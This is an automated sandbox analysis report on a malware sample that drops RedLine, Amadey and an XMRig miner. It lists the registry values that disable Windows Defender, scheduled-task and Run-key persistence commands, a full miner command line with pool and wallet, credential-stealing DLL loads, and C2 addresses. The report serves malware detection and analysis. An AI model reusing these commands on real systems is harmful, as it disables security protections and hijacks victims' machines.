Analysis Overview
SHA256
2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab
Threat Level: Known bad
The file 2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab was found to be: Known bad.
Malicious Activity Summary
xmrig
Aurora
Amadey
RedLine payload
Modifies Windows Defender Real-time Protection settings
RedLine
XMRig Miner payload
Downloads MZ/PE file
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Windows security modification
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-25 00:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-25 00:31
Reported
2023-02-25 00:34
Platform
win10v2004-20230221-en
Max time kernel
145s
Max time network
138s
Command Line
Signatures
Amadey
Aurora
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rEP98nA39.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2220 set thread context of 4268 | N/A | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nay67WA12.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ele75NW24.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe
"C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2972 -ip 2972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 2036
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4268 -ip 4268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 1088
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nay67WA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nay67WA12.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1576 -ip 1576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 1576
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rEP98nA39.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rEP98nA39.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
"C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ele75NW24.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ele75NW24.exe
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
"C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe"
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
"C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1720 -ip 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 1308
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\njt68oM72.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\njt68oM72.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 42iqvxeZwhYZGrYzGc44d3fv9Aq6TQ5jLbULdoHwfUd3Cnw6Ji2NC8G2LMxr6SwWTDGbrQs5rPXLk5odWxxnuj13K7yPrKZ.RIG1 -p X --algo rx/0 --cpu-max-threads-hint=50
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 2776 -ip 2776
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2776 -s 644
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 199.176.139.52.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | tcp | |
| US | 8.8.8.8:53 | 23.20.233.193.in-addr.arpa | udp |
| US | 20.189.173.4:443 | tcp | |
| DE | 193.233.20.23:4124 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| DE | 193.233.20.15:80 | 193.233.20.15 | tcp |
| DE | 193.233.20.19:80 | 193.233.20.19 | tcp |
| US | 8.8.8.8:53 | 15.20.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.20.233.193.in-addr.arpa | udp |
| RU | 62.204.41.245:80 | 62.204.41.245 | tcp |
| US | 8.8.8.8:53 | 245.41.204.62.in-addr.arpa | udp |
| RU | 62.204.41.88:80 | 62.204.41.88 | tcp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 88.41.204.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp | |
| NL | 45.15.159.15:80 | 45.15.159.15 | tcp |
| NL | 212.87.204.93:8081 | tcp | |
| US | 8.8.8.8:53 | 15.159.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | tcp | |
| DE | 193.233.20.23:4124 | tcp | |
| US | 8.8.8.8:53 | 62.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xiaoxiaojue.duckdns.org | udp |
| NL | 212.87.204.245:55215 | xiaoxiaojue.duckdns.org | tcp |
| US | 8.8.8.8:53 | 245.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
| MD5 | 11f2b1309186601a9e544fc34de193d9 |
| SHA1 | 328bcf6f4fbc69230bd22bf85977da1669a0b608 |
| SHA256 | 3aae52a5d31bb9bf230c24b47212fa5aaae3cc3d1de51df986caab2f62b8de84 |
| SHA512 | 081803e9d679e140399ee2059bac5124bc1dbd7e2dae38a61934bc0d1089ceb50482525d61f1e6fada9e20b3233a9c00d4c8f0929d9faf7a783dfcd198798a59 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
| MD5 | 11f2b1309186601a9e544fc34de193d9 |
| SHA1 | 328bcf6f4fbc69230bd22bf85977da1669a0b608 |
